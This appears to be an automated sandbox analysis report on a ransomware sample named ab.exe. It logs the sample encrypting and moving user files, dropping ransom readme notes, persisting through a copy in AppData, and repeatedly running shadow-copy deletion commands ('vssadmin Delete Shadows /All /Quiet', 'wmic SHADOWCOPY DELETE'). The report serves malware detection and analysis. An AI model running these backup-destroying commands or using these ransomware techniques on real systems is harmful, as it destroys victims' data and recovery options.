ID:--------------------------------------------------------------------------------MjY2NC15cjBHSlJ4UGYzSSswd3dmWWIvallTUUxZNVlOR1dlWE9mOGFoaEloMk9wdVIwTkNJREp2L2FwQ3NOOWU3Ty9CcUxGMW9nSlZTMmNkNjk1bFdCTU1HcVhGTml1REo3Rkl3dDAwcERtVitycTcvNS9mZTE4QWJEOENHWDI3UjlrQVM2TkFuWmkydjd5NXRnNmtiK0NObndndEoyODRVanhXU2kwREhBb1BCYnZkL25jT3hTWWtkTTVhR1M5eFFpdTRzR0I2ZTllZXVQNXU5V3lVb1kybHdsTmhKKys3MjF3TDNsVnlnNno0Q2pZQ0RPYmhVOEtRTWxVZ2ZrYmdtazdXMkl5aUZrV0pqSlFsNVMzY25XY08yK1h1a2t5RlRQNG1FVzV6R3V3aHVSN09lbldlaVlmbzRKaUVUVTE2dnNzdTJ6TGRKY2dSODR0VCtOdllaOVVzdkwrNjBld1RUeTVKWmZtODd6Kyt5SjVxYjVFZGJqbnU5VTZCUjVrNUU1cmdXU2ZtMkVmRFNJdmswc1hHOWRNZE1ydHJ5ODM5NDVmRHlBVGxmM3pydFVSN2k1UDIzTzB1dnBWVDRsVy9CbmQ0aUVCYnVZWnFwWGJ6WmZhdTZRYnNlaXl1YXJkKzdLWjBxajdRMW5FWkN5enFaR09zNXlaL3VKY2EyTW5QVUFlMEZ3YnRjNzlQUngwYmg3L1BLc2xpc1NnZmxNdUxHY1o0NDJKVWhTRGxOTG11SkYwclp3WnRKNTBHWWhUUmIrdG0rR3EramdMSUdZUHFNTmhuSHZHMW0vTDRlK2R0YVRtcTY1bUhTOXZjUjZZbVNwenJwY1ZhdGFudG94QzRINGpvb0ZvMTlWRDU1QXZ0V3VqZWhmOHpTNERORGZncHN0L04wNzBCbEhyam9oSENsRmRHdS9ZandPZ3ZnYmI0UTJlU0hTTnNoMndrbnZ0MkZyWjAvcllWcm45MkhaQnlMM01TRi9vNUJhSFBTYU0wMkpXVFdJSlNDV0hWNWFMdmJtU05sU05LQ1lOVVVtMzRMY3crWFYwSUVyU2FRZXVqQWo3MG1GcmovdFlIZmhkSU9CQzV5bExwbnQwOUxscnFXVmJmUGl0dHNvSXBxOGY1amFpZzM5dndwOHI1TmVpTTJxRXJnNTNINkJFN1BWZWl6eEFHNXFHRlVDeXhIMVI2bE12aCtaTGt0SGh6ZlIraDhUT3Frb2gwbkdVYVloTEJnU3hxekI4MjJLaUFiZTdBN0kycWFxb2NkOXJ4bitKdjltOHJ5ZU1ZZzlLQVI3bzVEVWdKZzdFNVNXL0FKb29HWDhnN2JNekRpUjZLN2FMZEt4REg3UGQ3UTVtVlZId3hlWFkzUjQ1ZkFVbytXMjdaaE8wRy82M2Y2SjlnM3lxejdNVVN1Z2h1cld2OGxlMUpzVWw0eUgvTkFGM2o1eU9KdUw4Ync0Y0ZPdUZZV2VkVzdpTGtCaXV0MGQ4VjIweXpEU1lqaDNrMUNuYnlINUJ5dWwvOUR4YnBtZWxMM2tCMDRIWkhhY2MybTNsY3hoU0g2T3lkbkUydW1idXJyR2dWNWJaS21IT1VpdCtNdUYx

Jump to dropped file

Yara detected RansomwareGeneric

Show sources

Source: Yara match

File source: Process Memory Space: ab.exe PID: 6212, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Show sources

Source: C:\Users\user\Desktop\ab.exe	File moved: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File deleted: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File moved: C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File deleted: C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File moved: C:\Users\user\Desktop\BNAGMGSPLO.jpg	Jump to behavior

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet	Jump to behavior
Source: vssadmin.exe, 00000010.00000002.285725415.00000000034C7000.00000004.00000020.sdmp	Binary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005468- TID: 00005608- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
Source: vssadmin.exe, 00000010.00000002.285725415.00000000034C7000.00000004.00000020.sdmp	Binary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005468- TID: 00005608- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002 n
Source: vssadmin.exe, 00000010.00000002.284948508.0000000001340000.00000004.00000040.sdmp	Binary or memory string: vssadminDeleteShadows/All/QuietO1R
Source: vssadmin.exe, 00000010.00000002.285712990.00000000034C0000.00000004.00000020.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinSta0\DefaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=FENIVHOUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowso
Source: vssadmin.exe, 00000010.00000002.285712990.00000000034C0000.00000004.00000020.sdmp	Binary or memory string: vssadmin Delete Shadows /All /Quiet
Source: vssadmin.exe, 00000010.00000002.285712990.00000000034C0000.00000004.00000020.sdmp	Binary or memory string: vssadmin Delete Shadows /All /Quiet'
Source: vssadmin.exe, 00000010.00000002.284764824.000000000107C000.00000004.00000001.sdmp	Binary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005468- TID: 00005608- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
Source: vssadmin.exe, 00000010.00000002.284764824.000000000107C000.00000004.00000001.sdmp	Binary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005468- TID: 00005608- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002 -
Source: vssadmin.exe, 00000019.00000002.291742139.0000000000CEC000.00000004.00000001.sdmp	Binary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00007608- TID: 00007612- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
Source: vssadmin.exe, 00000019.00000002.291742139.0000000000CEC000.00000004.00000001.sdmp	Binary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00007608- TID: 00007612- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002 -
Source: vssadmin.exe, 00000019.00000002.292512976.0000000003530000.00000004.00000040.sdmp	Binary or memory string: vssadminDeleteShadows/All/Quiet
Source: vssadmin.exe, 00000019.00000002.291815635.0000000000DC0000.00000004.00000020.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinSta0\Default
Source: vssadmin.exe, 0000001E.00000002.299021550.0000000000FD0000.00000004.00000020.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinSta0\Default*
Source: vssadmin.exe, 0000001E.00000002.299334254.00000000035A0000.00000004.00000040.sdmp	Binary or memory string: vssadminDeleteShadows/All/Quiet-
Source: vssadmin.exe, 0000001E.00000002.298998635.0000000000E3C000.00000004.00000001.sdmp	Binary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00007752- TID: 00007756- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
Source: vssadmin.exe, 0000001E.00000002.298998635.0000000000E3C000.00000004.00000001.sdmp	Binary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00007752- TID: 00007756- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002 -

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01309AF0 CryptStringToBinaryA,GetProcessHeap,HeapAlloc,CryptStringToBinaryA,CryptImportKey,GetProcessHeap,HeapFree,		2_2_01309AF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01310C10 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDuplicateKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,		2_2_01310C10

System Summary:

Source: ab.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01315590	2_2_01315590
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_0130ACE0	2_2_0130ACE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_012F9180	2_2_012F9180
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01347A30	2_2_01347A30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01310430	2_2_01310430
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_012FE4A0	2_2_012FE4A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01358C8F	2_2_01358C8F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_0134A5EB	2_2_0134A5EB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01310610	2_2_01310610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_012FAEE0	2_2_012FAEE0

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: String function: 0132F1B6 appears 34 times

Source: ab.exe, 00000000.00000003.274727314.0000000000823000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
Source: ab.exe, 00000000.00000000.271797098.000000000119C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
Source: ab.exe, 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
Source: ab.exe, 00000023.00000002.438717484.00000000013AC000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
Source: ab.exe	Binary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
Source: ab.exe.0.dr	Binary or memory string: OriginalFilenametaskhost.exej% vs ab.exe

Source: C:\Users\user\Desktop\ab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Section loaded: cscapi.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_012FBE70 OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,

2_2_012FBE70

Source: ab.exe	Virustotal: Detection: 88%
Source: ab.exe	Metadefender: Detection: 65%
Source: ab.exe	ReversingLabs: Detection: 96%

Source: C:\Users\user\Desktop\ab.exe

File read: C:\Users\user\Desktop\ab.exe

Jump to behavior

Source: ab.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ab.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ab.exe "C:\Users\user\Desktop\ab.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
Source: C:\Windows\SysWOW64\vssadmin.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
Source: C:\Windows\SysWOW64\vssadmin.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
Source: C:\Windows\SysWOW64\vssadmin.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet	Jump to behavior

Source: C:\Users\user\Desktop\ab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_012FB140 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,InitiateShutdownW,

2_2_012FB140

Source: C:\Users\user\Desktop\ab.exe	WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ab.exe	WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ab.exe	WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Users\user\Desktop\ab.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.spre.troj.evad.winEXE@27/228@0/0

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_012FAB30 GetModuleFileNameW,CopyFileW,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,SysFreeString,

2_2_012FAB30

Source: C:\Users\user\Desktop\ab.exe

File read: C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_01312230 GetDiskFreeSpaceW,

2_2_01312230

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_012FBE00 OpenSCManagerW,OpenServiceW,StartServiceW,CloseServiceHandle,

2_2_012FBE00

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_012FA970 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,CloseHandle,

2_2_012FA970

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1756:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_01
Source: C:\Users\user\Desktop\ab.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A86668A3-8F20-41F3-97D1-676B2AD6ADF7}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_01

Source: C:\Users\user\Desktop\ab.exe

File written: C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini

Jump to behavior

Source: ab.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ab.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ab.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ab.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ab.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ab.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ab.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: ab.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: ab.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ab.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ab.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ab.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ab.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_0132F190 push ecx; ret

2_2_0132F1A3

Persistence and Installation Behavior:

Yara detected PersistenceViaHiddenTask

Show sources

Source: Yara match	File source: 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ab.exe PID: 6212, type: MEMORYSTR

Creates processes via WMI

Show sources

Source: C:\Users\user\Desktop\ab.exe	WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ab.exe	WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ab.exe	WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Users\user\Desktop\ab.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Jump to dropped file

Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Desktop\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Desktop\GAOBCVIQIJ\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Desktop\LSBIHQFDVT\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Desktop\QNCYCDFIJJ\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Documents\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Documents\GAOBCVIQIJ\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Documents\LSBIHQFDVT\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Documents\QNCYCDFIJJ\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Downloads\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Favorites\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Searches\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	Jump to behavior

Boot Survival:

Yara detected PersistenceViaHiddenTask

Show sources

Source: Yara match	File source: 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ab.exe PID: 6212, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_012FBE00 OpenSCManagerW,OpenServiceW,StartServiceW,CloseServiceHandle,

2_2_012FBE00

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

API coverage: 8.4 %

